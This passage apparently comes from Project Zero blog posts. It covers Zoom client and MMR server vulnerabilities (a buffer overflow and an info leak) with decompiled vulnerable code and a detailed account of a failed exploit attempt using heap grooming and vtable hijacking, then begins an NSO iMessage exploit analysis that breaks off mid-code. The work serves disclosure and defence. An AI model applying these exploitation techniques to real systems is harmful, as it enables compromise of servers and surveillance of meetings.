For Microsoft, we suspect that the high time to fix and Microsoft's reliance on the grace period are consequences of the monthly cadence of Microsoft's "patch Tuesday" updates, which can make it more difficult for development teams to meet a disclosure deadline. We hope that Microsoft might consider implementing a more frequent patch cadence for security issues, or finding ways to further streamline their internal processes to land and ship code quicker.

Moving forward

This post represents some number-crunching we've done on our own public data, and we hope to continue this going forward. Now that we've established a baseline over the past few years, we plan to continue to publish an annual update to better understand how the trends progress.

To that end, we'd love to have even more insight into the processes and timelines of our vendors. We encourage all vendors to consider publishing aggregate data on their time-to-fix and time-to-patch for externally reported vulnerabilities. Through more transparency, information sharing, and collaboration across the industry, we believe we can learn from each other's best practices, better understand existing difficulties and hopefully make the internet a safer place for all.

Zooming in on Zero-click Exploits

Posted by Natalie Silvanovich, Project Zero


Zoom is a video conferencing platform that has gained popularity throughout the pandemic. Unlike other video conferencing systems that I have investigated, where one user initiates a call that other users must immediately accept or reject, Zoom calls are typically scheduled in advance and joined via an email invitation. In the past, I hadn’t prioritized reviewing Zoom because I believed that any attack against a Zoom client would require multiple clicks from a user. However, a zero-click attack against the Windows Zoom client was recently revealed at Pwn2Own, showing that it does indeed have a fully remote attack surface. The following post details my investigation into Zoom.

This analysis resulted in two vulnerabilities being reported to Zoom. One was a buffer overflow that affected both Zoom clients and MMR servers, and one was an info leak that is only useful to attackers on MMR servers. Both of these vulnerabilities were fixed on November 24, 2021.

Zoom Attack Surface Overview

Zoom’s main feature is multi-user conference calls called meetings that support a variety of features including audio, video, screen sharing and in-call text messages. There are several ways that users can join Zoom meetings. To start, Zoom provides full-featured installable clients for many platforms, including Windows, Mac, Linux, Android and iPhone. Users can also join Zoom meetings using a browser link, but they are able to use fewer features of Zoom. Finally, users can join a meeting by dialing phone numbers provided in the invitation on a touch-tone phone, but this only allows access to the audio stream of a meeting. This research focused on the Zoom client software, as the other methods of joining calls use existing device features.

Zoom clients support several communication features other than meetings that are available to a user’s Zoom Contacts. A Zoom Contact is a user that another user has added as a contact using the Zoom user interface. Both users must consent before they become Zoom Contacts. Afterwards, the users can send text messages to one another outside of meetings and start channels for persistent group conversations. Also, if either user hosts a meeting, they can invite the other user in a manner that is similar to a phone call: the other user is immediately notified and they can join the meeting with a single click. These features represent the zero-click attack surface of Zoom. Note that this attack surface is only available to attackers that have convinced their target to accept them as a contact. Likewise, meetings are part of the one-click attack surface only for Zoom Contacts, as other users need to click several times to enter a meeting.

That said, it’s likely not that difficult for a dedicated attacker to convince a target to join a Zoom call even if it takes multiple clicks, and the way some organizations use Zoom presents interesting attack scenarios. For example, many groups host public Zoom meetings, and Zoom supports a paid Webinar feature where large groups of unknown attendees can join a one-way video conference. It could be possible for an attacker to join a public meeting and target other attendees. Zoom also relies on a server to transmit audio and video streams, and end-to-end encryption is off by default. It could be possible for an attacker to compromise Zoom’s servers and gain access to meeting data.

Zoom Messages

I started out by looking at the zero-click attack surface of Zoom. Loading the Linux client into IDA, it appeared that a great deal of its server communication occurred over XMPP. Based on strings in the binary, it was clear that XMPP parsing was performed using a library called gloox. I fuzzed this library using AFL and other coverage-guided fuzzers, but did not find any vulnerabilities. I then looked at how Zoom uses the data provided over XMPP.

XMPP traffic seemed to be sent over SSL, so I located the SSL_write function in the binary based on log strings, and hooked it using Frida. The output contained many XMPP stanzas (messages) as well as other network traffic, which I analyzed to determine how XMPP is used by Zoom. XMPP is used for most communication between Zoom clients outside of meetings, such as messages and channels, and is also used for signaling (call set-up) when a Zoom Contact invites another Zoom Contact to a meeting.

I spent some time going through the client binary trying to determine how the client processes XMPP, for example, if a stanza contains a text message, how is that message extracted and displayed in the client. Even though the Zoom client contains many log strings, this was challenging, and I eventually asked my teammate Ned Williamson for help locating symbols for the client. He discovered that several old versions of the Android Zoom SDK contained symbols. While these versions are roughly five years old, and do not present a complete view of the client as they only include some libraries that it uses, they were immensely helpful in understanding how Zoom uses XMPP.

Application-defined tags can be added to gloox’s XMPP parser by extending the class StanzaExtension and implementing the method newInstance to define how the tag is converted into a C++ object. Parsed XMPP stanzas are then processed using the MessageHandler class. Application developers extend this class, implementing the method handleMessage with code that performs application functionality based on the contents of the stanza received. Zoom implements its XMPP handling in CXmppIMSession::handleMessage, which is a large function that is an entrypoint to most messaging and calling features. The final processing stage of many XMPP tags is in the class ns_zoom_messager::CZoomMMXmppWrapper, which contains many methods starting with ‘On’ that handle specific events. I spent a fair amount of time analyzing these code paths, but didn’t find any bugs. Interestingly, Thijs Alkemade and Daan Keuper released a write-up of their Pwn2Own bug after I completed this research, and it involved a vulnerability in this area.

RTP Processing

Afterwards, I investigated how Zoom clients process audio and video content. Like all other video conferencing systems that I have analyzed, it uses Real-time Transport Protocol (RTP) to transport this data. Based on log strings included in the Linux client binary, Zoom appears to use a branch of WebRTC for audio. Since I have looked at this library a great deal in previous posts, I did not investigate it further. For video, Zoom implements its own RTP processing and uses a custom underlying codec named Zealot (libzlt).

Analyzing the Linux client in IDA, I found what I believed to be the video RTP entrypoint, and fuzzed it using afl-qemu. This resulted in several crashes, mostly in RTP extension processing. I tried modifying the RTP sent by a client to reproduce these bugs, but it was not received by the device on the other side and I suspected the server was filtering it. I tried to get around this by enabling end-to-end encryption, but Zoom does not encrypt RTP headers, only the contents of RTP packets (as is typical of most RTP implementations).

Curious about how Zoom server filtering works, I decided to set up Zoom On-Premises Deployment. This is a Zoom product that allows customers to set up on-site servers to process their organization’s Zoom calls. This required a fair amount of configuration, and I ended up reaching out to the Zoom Security Team for assistance. They helped me get it working, and I greatly appreciate their contribution to this research.

Zoom On-Premises Deployments consist of two hosts: the controller and the Multimedia Router (MMR). Analyzing the traffic to each server, it became clear that the MMR is the host that transmits audio and video content between Zoom clients. Loading the code for the MMR process into IDA, I located where RTP is processed, and it indeed parses the extensions as a part of its forwarding logic and verifies them correctly, dropping any RTP packets that are malformed.

The code that processes RTP on the MMR appeared different than the code that I fuzzed on the device, so I set up fuzzing on the server code as well. This was challenging, as the code was in the MMR binary, which was not compiled as a relocatable binary (more on this later). This meant that I couldn’t load it as a library and call into specific offsets in the binary as I usually do to fuzz binaries that don’t have source code available. Instead, I compiled my own fuzzing stub that called the function I wanted to fuzz as a relocatable that defined fopen, and loaded it using LD_PRELOAD when executing the MMR binary. Then my code would take control of execution the first time that the MMR binary called fopen, and was able to call the function being fuzzed.

This approach has a lot of downsides, the biggest being that the fuzzing stub can’t accept command line parameters, execution is fairly slow and a lot of fuzzing tools don’t honor LD_PRELOAD on the target. That said, I was able to fuzz with code coverage using Mateusz Jurczyk’s excellent DrSanCov, with no results.

Packet Processing

When analyzing RTP traffic, I noticed that both Zoom clients and the MMR server process a large number of packets that didn’t appear to be RTP or XMPP. Looking at the SDK with symbols, one library appeared to do a lot of serialization: libssb_sdk.so. This library contains many classes with the methods load_from and save_to defined with identical declarations, so it is likely that they all implement the same virtual class.

One parameter to the load_from methods is an object of class msg_db_t, which implements a buffer that supports reading different data types. Deserialization is performed by load_from methods by reading needed data from the msg_db_t object, and serialization is performed by save_to methods by writing to it.

After hooking a few save_to methods with Frida and comparing the written output to data sent with SSL_write, it became clear that these serialization classes are part of the remote attack surface of Zoom. Reviewing each load_from method, several contained code similar to the following (from ssb::conf_send_msg_req::load_from).

  ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::operator>>(
      msg_db, &this->str_len, consume_bytes, error_out);
  str_len = this->str_len;
  if ( str_len )
  {
    mem = operator new[](str_len);
    out_len = 0;
    this->str_mem = mem;
    ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::
        read_str_with_len(msg_db, mem, &out_len);

read_str_with_len is defined as follows.

int __fastcall ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::
    read_str_with_len(msg_db_t* msg, signed __int8 *mem,
                      unsigned int *len)
{
  if ( !msg->invalid )
  {
    ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::operator>>(msg, len, (int)len, 0);
    if ( !msg->invalid )
    {
      if ( *len )
        ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::
            read(msg, mem, *len, 0);
    }
  }
  return msg;
}

Note that the string buffer is allocated based on a length read from the msg_db_t buffer, but then a second length is read from the buffer and used as the length of the string that is read. This means that if an attacker could manipulate the contents of the msg_db_t buffer, they could specify the length of the buffer allocated, and overwrite it with any length of data (up to a limit of 0x1FFF bytes, not shown in the code snippet above).
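
The flaw comes down to two independent lengths describing one buffer. A minimal C++ sketch of the same pattern, with the missing check added, might look like the following. `Reader`, `load_string_checked` and `kMaxLen` are hypothetical names for illustration, `Reader` is only a stand-in for msg_db_t, and the little-endian 32-bit length encoding is an assumption rather than Zoom's actual wire format.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <string>
#include <utility>
#include <vector>

// Hypothetical stand-in for msg_db_t: a read cursor over attacker-supplied bytes.
class Reader {
public:
    explicit Reader(std::vector<std::uint8_t> data) : data_(std::move(data)), pos_(0) {}

    // Reads a 32-bit length (little-endian is an assumption); false if exhausted.
    bool read_u32(std::uint32_t& out) {
        if (data_.size() - pos_ < 4) return false;
        out = 0;
        for (int i = 0; i < 4; ++i)
            out |= static_cast<std::uint32_t>(data_[pos_ + i]) << (8 * i);
        pos_ += 4;
        return true;
    }

    // Copies n bytes into dst; false if fewer than n bytes remain.
    bool read_bytes(std::uint8_t* dst, std::size_t n) {
        if (data_.size() - pos_ < n) return false;
        if (n == 0) return true;
        std::memcpy(dst, data_.data() + pos_, n);
        pos_ += n;
        return true;
    }

private:
    std::vector<std::uint8_t> data_;
    std::size_t pos_;
};

// Cap borrowed from the 0x1FFF limit mentioned above; applying it to the
// allocation length as well is an assumption of this sketch.
const std::uint32_t kMaxLen = 0x1FFF;

// The buffer is sized from the first length, and the copy is refused when
// the second length read from the same stream does not fit in it.
bool load_string_checked(Reader& r, std::string& out) {
    std::uint32_t alloc_len = 0;
    std::uint32_t copy_len = 0;
    if (!r.read_u32(alloc_len) || alloc_len > kMaxLen) return false;
    if (!r.read_u32(copy_len)) return false;
    if (copy_len > alloc_len) return false;  // the check the flawed code lacks
    std::vector<std::uint8_t> buf(alloc_len);
    if (!r.read_bytes(buf.data(), copy_len)) return false;
    out.assign(buf.begin(), buf.begin() + copy_len);
    return true;
}
```

Given the bytes 02 00 00 00 08 00 00 00 followed by eight bytes of data, this function refuses the copy because the second length (8) exceeds the allocation (2). The pattern shown in the decompiled code would instead write all eight bytes into the two-byte buffer.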

I tested this bug by hooking SSL_write with Frida, and sending the malformed packet, and it caused the Zoom client to crash on a variety of platforms. This vulnerability was assigned CVE-2021-34423 and fixed on November 24, 2021.

Looking at the code for the MMR server, I noticed that ssb::conf_send_msg_req::load_from, the method the vulnerability occurs in, was also present on the MMR server. Since the MMR forwards Zoom meeting traffic from one client to another, it makes sense that it might also deserialize this packet type. I analyzed the MMR code in IDA, and found that deserialization of this class only occurs during Zoom Webinars. I purchased a Zoom Webinar license, and was able to crash my own Zoom MMR server by sending this packet. I was not willing to test a vulnerability of this type on Zoom’s public MMR servers, but it seems reasonably likely that the same code was also in Zoom’s public servers.

Looking further at deserialization, I noticed that all deserialized objects contain an optional field of type ssb::dyna_para_table_t, which is basically a properties table that allows a map of name strings to variant objects to be included in the deserialized object. The variants in the table are implemented by the structure ssb::variant_t, as follows.

union var_data{
        char i8;
        char* i8_ptr;
        short i16;
        short* i16_ptr;
        int i32;
        int* i32_ptr;
        long long i64;
        long long* i64_ptr;
};

struct variant{
        char type;
        short length;
        var_data data;
};

The value of the type field corresponds to the width of the variant data (1 for 8-bit, 2 for 16-bit, 3 for 32-bit and 4 for 64-bit). The length field specifies whether the variant is an array and, if so, its length. If it has the value 0, the variant is not an array, and a numeric value is read from the data field based on its type. If the length field has any other value, the data field is cast to a pointer, and an array of that size is read.
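
The interpretation rules above can be summarized in a short C++ sketch. `element_width`, `VariantLayout` and `describe_variant` are hypothetical names introduced for illustration, and treating the length as an unsigned 16-bit count is an assumption (the structure above declares it as a short).

```cpp
#include <cstddef>
#include <cstdint>

// Type codes as described in the text: 1 = 8-bit, 2 = 16-bit, 3 = 32-bit,
// 4 = 64-bit. Returns the element width in bytes, or 0 for an unknown code.
std::size_t element_width(std::uint8_t type) {
    switch (type) {
        case 1: return 1;
        case 2: return 2;
        case 3: return 4;
        case 4: return 8;
        default: return 0;
    }
}

// Hypothetical summary of how a variant's data field would be interpreted.
struct VariantLayout {
    bool valid;                 // false when the type code is not recognized
    bool is_array;              // true when the data field holds a pointer
    std::size_t payload_bytes;  // bytes of numeric or array data to read
};

VariantLayout describe_variant(std::uint8_t type, std::uint16_t length) {
    VariantLayout layout = {false, false, 0};
    const std::size_t width = element_width(type);
    if (width == 0) return layout;  // unknown type code
    layout.valid = true;
    layout.is_array = (length != 0);
    layout.payload_bytes = layout.is_array ? width * length : width;
    return layout;
}
```

The point of the sketch is that the same data field is either a value or a pointer depending only on the length field, which is why any code path that skips this decision is a candidate for type confusion.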

My immediate concern with this implementation was that it could be prone to type confusion. One possibility is that a numeric value could be confused with an array pointer, which would allow an attacker to create a variant with a pointer that they specify. However, both the client and MMR perform very aggressive type checks on variants they treat as arrays. Another possibility is that a pointer could be confused with a numeric value. This could allow an attacker to determine the address of a buffer they control if the value is ever returned to the attacker. I found a few locations in the MMR code where a pointer is converted to a numeric value in this way and logged, but nowhere that an attacker could obtain the incorrectly cast value. Finally, I looked at how array data is handled, and I found that there are several locations where byte array variants are converted to strings; however, not all of them checked that the byte array has a null terminator. This meant that if these variants were converted to strings, the string could contain the contents of uninitialized memory.
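
A bounded conversion avoids the missing-terminator problem by never reading past the declared array length. The following is a minimal C++ sketch under that assumption; `bytes_to_string` is a hypothetical helper, not a function from the Zoom code.

```cpp
#include <cstddef>
#include <cstring>
#include <string>

// Converts a byte-array variant to a string without reading past `len`.
// If a NUL byte appears within the first `len` bytes, the string stops there;
// otherwise exactly `len` bytes are used and nothing beyond them is touched.
std::string bytes_to_string(const char* data, std::size_t len) {
    if (data == nullptr || len == 0) return std::string();
    const void* nul = std::memchr(data, '\0', len);
    const std::size_t n =
        nul ? static_cast<std::size_t>(static_cast<const char*>(nul) - data) : len;
    return std::string(data, n);
}
```

A conversion that instead scans for a terminator without a length bound keeps copying whatever follows the array in memory, which is the behavior described above.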

Most of the time, packets sent to the MMR by one user are immediately forwarded to other users without being deserialized by the server. For some bugs, this is a useful feature, for example, it is what allows CVE-2021-34423 discussed earlier to be triggered on a client. However, an information leak in variants needs to occur on the server to be useful to an attacker. When a client deserializes an incoming packet, it is for use on the device, so even if a deserialized string contains sensitive information, it is unlikely that this information will be transmitted off the device. Meanwhile, the MMR exists expressly to transmit information from one user to another, so if a string gets deserialized, there is a reasonable chance that it gets sent to another user, or alters server behavior in an observable way. So, I tried to find a way to get the server to deserialize a variant and convert it to a string. I eventually figured out that when a user logs into Zoom in a browser, the browser can’t process serialized packets, so the MMR must convert them to strings so they can be accessed through web requests. Indeed, I found that if I removed the null terminator from the user_name variant, it would be converted to a string and sent to the browser as the user’s display name.

The vulnerability was assigned CVE-2021-34424 and fixed on November 24, 2021. I tested it on my own MMR as well as Zoom’s public MMR, and it worked and returned pointer data in both cases.

Exploit Attempt

I attempted to exploit my local MMR server with these vulnerabilities, and while I had success with portions of the exploit, I was not able to get it working. I started off by investigating the possibility of creating a client that could trigger each bug outside of the Zoom client, but client authentication appeared complex and I lacked symbols for this part of the code, so I didn’t pursue this as I suspected it would be very time-consuming. Instead, I analyzed the exploitability of the bugs by triggering them from a Linux Zoom client hooked with Frida.

I started off by investigating the impact of heap corruption on the MMR process. MMR servers run on CentOS 7, which uses a modern glibc heap, so exploiting heap unlinking did not seem promising. I looked into overwriting the vtable of a C++ object allocated on the heap instead.

I wrote several Frida scripts that hooked malloc on the server, and used them to monitor how incoming traffic affects allocation. It turned out that there are not many ways for an attacker to control memory allocation on an MMR server that are useful for exploiting this vulnerability. There are several packet types that an attacker can send to the server that cause memory to be allocated on the heap and then freed when processing is finished, but not as many where the attacker can control when the memory is allocated and when it is freed. Moreover, the MMR server performs different types of processing in separate threads that use unique heap arenas, so many areas of the code where this type of allocation is likely to occur, such as connection management, allocate memory in a different heap arena than the thread where the bug occurs. The only such allocations I could find that were made in the same arena were related to meeting set-up: when a user joins a meeting, certain objects are allocated on the heap, which are then freed when they leave the meeting. Unfortunately, these allocations are difficult to automate as they require many unique user accounts in order for the allocation to be performed repeatedly, and allocation takes an observable amount of time (seconds).

I eventually wrote Frida scripts that looked for free chunks of unusual sizes that bordered C++ objects with vtables during normal MMR operation. There were a few allocation sizes that met these criteria, and since CVE-2021-34423 allows for the size of the buffer that is overflowed to be specified by the attacker, I was able to corrupt the memory of the adjacent object. Unfortunately, heap verification was very robust, so in most cases, the MMR process would crash due to a heap verification error before a virtual call was made on the corrupted object. I eventually got around this by focusing on allocation sizes that are small enough to be stored in fastbins by the heap, as heap chunks that are stored in fastbins do not contain verifiable heap metadata. Chunks of size 58 turned out to be the best choice, and by triggering the bug with an allocation of that size, I was able to control the pointer of a virtual call about one in ten times I triggered the bug.
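
For context on which sizes qualify, glibc rounds each request up to a chunk size and serves sufficiently small chunks from fastbins. The sketch below reproduces that arithmetic in C++ using constants that are believed to match default 64-bit glibc (8-byte size field, 16-byte alignment, 32-byte minimum chunk, 128-byte default fastbin limit). The constants and helper names are assumptions, not values taken from the MMR binary, and the text does not say whether 58 refers to the requested size or the chunk size.

```cpp
#include <cstddef>

// Assumed defaults for 64-bit glibc; not taken from the MMR binary.
const std::size_t kSizeField = 8;       // per-chunk size field
const std::size_t kAlignMask = 15;      // 16-byte chunk alignment
const std::size_t kMinChunk = 32;       // smallest chunk glibc hands out
const std::size_t kFastbinLimit = 128;  // default largest fastbin chunk

// Rounds a malloc request up to the chunk size the allocator would use.
std::size_t chunk_size_for_request(std::size_t request) {
    const std::size_t padded = (request + kSizeField + kAlignMask) & ~kAlignMask;
    return padded < kMinChunk ? kMinChunk : padded;
}

// True when a freed chunk for this request would be eligible for a fastbin.
bool lands_in_fastbin(std::size_t request) {
    return chunk_size_for_request(request) <= kFastbinLimit;
}
```

Under these assumptions a 58-byte request becomes an 80-byte chunk, comfortably within the fastbin range.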

The next step was to figure out where to point the pointer I could control, and this turned out to be more challenging than I expected. The MMR process did not have ASLR enabled when I did this research (it was enabled in version 4.6.20211128.136, which was released on November 28, 2021), so I was hoping to find a series of locations in the binary that this call could be directed to that would eventually end in a call to execv with controllable parameters, as the MMR initialization code contains many calls to this function. However, there were a few features of the server that made this difficult. First, only the MMR binary was loaded at a fixed location. The heap and system libraries were not, so only the actual MMR code was available without bypassing ASLR. Second, if the MMR crashes, it has an exponential backoff which culminates in it respawning every hour on the hour. This limits how many exploit attempts an attacker has. It is realistic that an attacker might spend days or even weeks trying to exploit a server, but this still limits them to hundreds of attempts. This means that any exploit of an MMR server would need to be at least somewhat reliable, so certain techniques that require a lot of attempts, such as allocating a large buffer on the heap and trying to guess its location, were not practical.

I eventually decided that it would be helpful to allocate a buffer on the heap with controlled contents and determine its location. This would make the exploit fairly reliable in the case that the overflow successfully leads to a virtual call, as the buffer could be used as a fake vtable, and also contain strings that could be used as parameters to execv. I tried using CVE-2021-34424 to leak such an address, but wasn’t able to get this working.

This bug allows the attacker to provide a string of any size, which then gets copied out of bounds up until a null character is encountered in memory, and then returned. It is possible for CVE-2021-34424 to return a heap pointer, as the MMR maps the heap that gets corrupted at a low address that does not usually contain null bytes, however, I could not find a way to force a specific heap pointer to be allocated next to the string buffer that gets copied out of bounds. C++ objects used by the MMR tend to be virtual objects, so the first 64 bits of most object allocations are a vtable which contains null bytes, ending the copy. Other allocated structures, especially larger ones, tend to contain non-pointer data. I was able to get this bug to return heap pointers by specifying a string that was less than 64 bits long, so the nearby allocations were sometimes the pointers themselves, but allocations of this size are so frequent it was not possible to ascertain what heap data they pointed to with any accuracy.

One last idea I had was to use another type confusion bug to leak a pointer to a controllable buffer. There is one such bug in the processing of deserialized ssb::kv_update_req objects. This object’s ssb::dyna_para_table_t table contains a variant named nodeid which represents the specific Zoom client that the message refers to. If an attacker changes this variant to be of type array instead of a 32-bit integer, the address of the pointer to this array will be logged as a string. I tried to combine CVE-2021-34424 with this bug, hoping that it might be possible for the leaked data to be this log string that contains pointer information. Unfortunately, I wasn’t able to get this to work because of timing: the log entry needs to be logged at almost exactly the same time as the bug is triggered so that the log data is still in memory, and I wasn't able to send packets fast enough. I suspect it might be possible for this to work with improved automation, as I was relying on clients hooked with Frida and browsers to interact with the Zoom server, but I decided not to pursue this as it would require tooling that would take substantial effort to develop.

Conclusion

I performed a security analysis of Zoom and reported two vulnerabilities. One was a buffer overflow that affected both Zoom clients and MMR servers, and one was an info leak that is only useful to attackers on MMR servers. Both of these vulnerabilities were fixed on November 24, 2021.

The vulnerabilities in Zoom’s MMR server are especially concerning, as this server processes meeting audio and video content, so a compromise could allow an attacker to monitor any Zoom meetings that do not have end-to-end encryption enabled. While I was not successful in exploiting these vulnerabilities, I was able to use them to perform many elements of exploitation, and I believe that an attacker would be able to exploit them with sufficient investment. The lack of ASLR in the Zoom MMR process greatly increased the risk that an attacker could compromise it, and it is positive that Zoom has recently enabled it. That said, if vulnerabilities similar to the ones that I reported still exist in the MMR server, it is likely that an attacker could bypass it, so it is also important that Zoom continue to improve the robustness of the MMR code.

It is also important to note that this research was possible because Zoom allows customers to set up their own servers. No other video conferencing solution with proprietary servers that I have investigated allows this, so it is unclear how these results compare to other video conferencing platforms.

Overall, while the client bugs that were discovered during this research were comparable to what Project Zero has found in other videoconferencing platforms, the server bugs were surprising, especially given that the server lacked ASLR and supports modes of operation that are not end-to-end encrypted.

There are a few factors that commonly lead to security problems in videoconferencing applications that contributed to these bugs in Zoom. One is the huge amount of code included in Zoom. There were large portions of code that I couldn’t determine the functionality of, and many of the classes that could be deserialized didn’t appear to be commonly used. This both increases the difficulty of security research and increases the attack surface by making more code that could potentially contain vulnerabilities available to attackers. In addition, Zoom uses many proprietary formats and protocols, which meant that understanding the attack surface of the platform and creating the tooling to manipulate specific interfaces was very time-consuming. Using the features we tested also required paying roughly $1500 USD in licensing fees. These barriers to security research likely mean that Zoom is not investigated as often as it could be, potentially leading to simple bugs going undiscovered.

Still, my largest concern in this assessment was the lack of ASLR in the Zoom MMR server. ASLR is arguably the most important mitigation in preventing exploitation of memory corruption, and most other mitigations rely on it on some level to be effective. There is no good reason for it to be disabled in the vast majority of software. There has recently been a push to reduce the susceptibility of software to memory corruption vulnerabilities by moving to memory-safe languages and implementing enhanced memory mitigations, but this relies on vendors using the security measures provided by the platforms they write software for. All software written for platforms that support ASLR should have it (and other basic memory mitigations) enabled.

The closed nature of Zoom also impacted this analysis greatly. Most video conferencing systems use open-source software, either WebRTC or PJSIP. While these platforms are not free of problems, it’s easier for researchers, customers and vendors alike to verify their security properties and understand the risk they present because they are open. Closed-source software presents unique security challenges, and Zoom could do more to make their platform accessible to security researchers and others who wish to evaluate it. While the Zoom Security Team helped me access and configure server software, it is not clear that support is available to other researchers, and licensing the software was still expensive. Zoom, and other companies that produce closed-source security-sensitive software, should consider how to make their software accessible to security researchers.

A deep dive into an NSO zero-click iMessage exploit: Remote Code Execution

Posted by Ian Beer & Samuel Groß of Google Project Zero

We want to thank Citizen Lab for sharing a sample of the FORCEDENTRY exploit with us, and Apple’s Security Engineering and Architecture (SEAR) group for collaborating with us on the technical analysis. The editorial opinions reflected below are solely Project Zero’s and do not necessarily reflect those of the organizations we collaborated with during this research.

Earlier this year, Citizen Lab managed to capture an NSO iMessage-based zero-click exploit being used to target a Saudi activist. In this two-part blog post series we will describe for the first time how an in-the-wild zero-click iMessage exploit works.

Based on our research and findings, we assess this to be one of the most technically sophisticated exploits we've ever seen, further demonstrating that the capabilities NSO provides rival those previously thought to be accessible to only a handful of nation states.

The vulnerability discussed in this blog post was fixed on September 13, 2021 in iOS 14.8 as CVE-2021-30860.

NSO

NSO Group is one of the highest-profile providers of "access-as-a-service", selling packaged hacking solutions which enable nation state actors without a home-grown offensive cyber capability to "pay-to-play", vastly expanding the number of nations with such cyber capabilities.

For years, groups like Citizen Lab and Amnesty International have been tracking the use of NSO's mobile spyware package "Pegasus". Despite NSO's claims that they "[evaluate] the potential for adverse human rights impacts arising from the misuse of NSO products" Pegasus has been linked to the hacking of the New York Times journalist Ben Hubbard by the Saudi regime, hacking of human rights defenders in Morocco and Bahrain, the targeting of Amnesty International staff and dozens of other cases.

Last month the United States added NSO to the "Entity List", severely restricting the ability of US companies to do business with NSO and stating in a press release that "[NSO's tools] enabled foreign governments to conduct transnational repression, which is the practice of authoritarian governments targeting dissidents, journalists and activists outside of their sovereign borders to silence dissent."

Citizen Lab was able to recover these Pegasus exploits from an iPhone and therefore this analysis covers NSO's capabilities against iPhone. We are aware that NSO sells similar zero-click capabilities which target Android devices; Project Zero does not have samples of these exploits but if you do, please reach out.

From One to Zero

In previous cases such as the Million Dollar Dissident from 2016, targets were sent links in SMS messages:

Screenshots of Phishing SMSs reported to Citizen Lab in 2016

source: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/

The target was only hacked when they clicked the link, a technique known as a one-click exploit. Recently, however, it has been documented that NSO is offering their clients zero-click exploitation technology, where even very technically savvy targets who might not click a phishing link are completely unaware they are being targeted. In the zero-click scenario no user interaction is required, meaning the attacker doesn't need to send phishing messages; the exploit just works silently in the background. Short of not using a device, there is no way to prevent exploitation by a zero-click exploit; it's a weapon against which there is no defense.

One weird trick

The initial entry point for Pegasus on iPhone is iMessage. This means that a victim can be targeted just using their phone number or AppleID username.

iMessage has native support for GIF images, the typically small and low quality animated images popular in meme culture. You can send and receive GIFs in iMessage chats and they show up in the chat window. Apple wanted to make those GIFs loop endlessly rather than only play once, so very early on in the iMessage parsing and processing pipeline (after a message has been received but well before the message is shown), iMessage calls the following method in the IMTranscoderAgent process (outside the "BlastDoor" sandbox), passing any image file received with the extension .gif:

  [IMGIFUtils copyGifFromPath:toDestinationPath:error]

Looking at the selector name, the intention here was probably to just copy the GIF file before editing the loop count field, but the semantics of this method are different. Under the hood it uses the CoreGraphics APIs to render the source image to a new GIF file at the destination path. And just because the source filename has to end in .gif, that doesn't mean it's really a GIF file.

The ImageIO library, as detailed in a previous Project Zero blogpost, is used to guess the correct format of the source file and parse it, completely ignoring the file extension. Using this "fake gif" trick, over 20 image codecs are suddenly part of the iMessage zero-click attack surface, including some very obscure and complex formats, remotely exposing probably hundreds of thousands of lines of code.
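
Content-based format detection of this kind can be illustrated with a short C++ sketch that looks only at leading magic bytes. This is not ImageIO's actual logic: `sniff_format` is a hypothetical helper, and it recognizes just the well-known GIF and PDF signatures.

```cpp
#include <cstddef>
#include <cstring>
#include <string>

// Guesses a format from the leading magic bytes only. The file name and
// extension are deliberately never consulted.
std::string sniff_format(const unsigned char* data, std::size_t len) {
    if (len >= 6 && (std::memcmp(data, "GIF87a", 6) == 0 ||
                     std::memcmp(data, "GIF89a", 6) == 0)) {
        return "gif";
    }
    if (len >= 5 && std::memcmp(data, "%PDF-", 5) == 0) {
        return "pdf";
    }
    return "unknown";
}
```

A file named cat.gif whose contents begin with %PDF- is reported as pdf by a detector like this, which is the mismatch the "fake gif" trick relies on.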

Note: Apple inform us that they have restricted the available ImageIO formats reachable from IMTranscoderAgent starting in iOS 14.8.1 (26 October 2021), and completely removed the GIF code path from IMTranscoderAgent starting in iOS 15.0 (20 September 2021), with GIF decoding taking place entirely within BlastDoor.

A PDF in your GIF

NSO uses the "fake gif" trick to target a vulnerability in the CoreGraphics PDF parser.

PDF was a popular target for exploitation around a decade ago, due to its ubiquity and complexity. Plus, the availability of JavaScript inside PDFs made development of reliable exploits far easier. The CoreGraphics PDF parser doesn't seem to interpret JavaScript, but NSO managed to find something equally powerful inside the CoreGraphics PDF parser...

Extreme compression

In the late 1990s, bandwidth and storage were much more scarce than they are now. It was in that environment that the JBIG2 standard emerged. JBIG2 is a domain-specific image codec designed to compress images where pixels can only be black or white.

It was developed to achieve extremely high compression ratios for scans of text documents and was implemented and used in high-end office scanner/printer devices like the Xerox WorkCentre device shown below. If you used the scan-to-PDF functionality of a device like this a decade ago, your PDF likely had a JBIG2 stream in it.

A Xerox WorkCentre 7500 series multifunction printer, which used JBIG2 for its scan-to-pdf functionality

source: https://www.office.xerox.com/en-us/multifunction-printers/workcentre-7545-7556/specifications

The PDF files produced by those scanners were exceptionally small, perhaps only a few kilobytes. There are two novel techniques which JBIG2 uses to achieve these extreme compression ratios which are relevant to this exploit:

Technique 1: Segmentation and substitution

Effectively every text document, especially those written in languages with small alphabets like English or German, consists of many repeated letters (also known as glyphs) on each page. JBIG2 tries to segment each page into glyphs then uses simple pattern matching to match up glyphs which look the same:

Simple pattern matching can find all the shapes which look similar on a page, in this case all the 'e's

JBIG2 doesn't actually know anything about glyphs and it isn't doing OCR (optical character recognition). A JBIG2 encoder is just looking for connected regions of pixels and grouping similar-looking regions together. The compression algorithm is to simply substitute all sufficiently similar-looking regions with a copy of just one of them:

Replacing all occurrences of similar glyphs with a copy of just one often yields a document which is still quite legible and enables very high compression ratios

In this case the output is perfectly readable but the amount of information to be stored is significantly reduced. Rather than needing to store all the original pixel information for the whole page you only need a compressed version of the "reference glyph" for each character and the relative coordinates of all the places where copies should be made. The decompression algorithm then treats the output page like a canvas and "draws" the exact same glyph at all the stored locations.
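The substitution scheme can be sketched in a few lines of Python. This is a toy model rather than the JBIG2 bitstream format: the function names, the tuple-based bitmap representation and the pixel-difference threshold are all assumptions made for illustration.

```python
def pixel_difference(a, b):
    """Count differing pixels between two equally sized glyph bitmaps."""
    return sum(pa != pb for ra, rb in zip(a, b) for pa, pb in zip(ra, rb))


def compress(glyphs, threshold=1):
    """glyphs is a list of ((x, y), bitmap); returns (references, placements)."""
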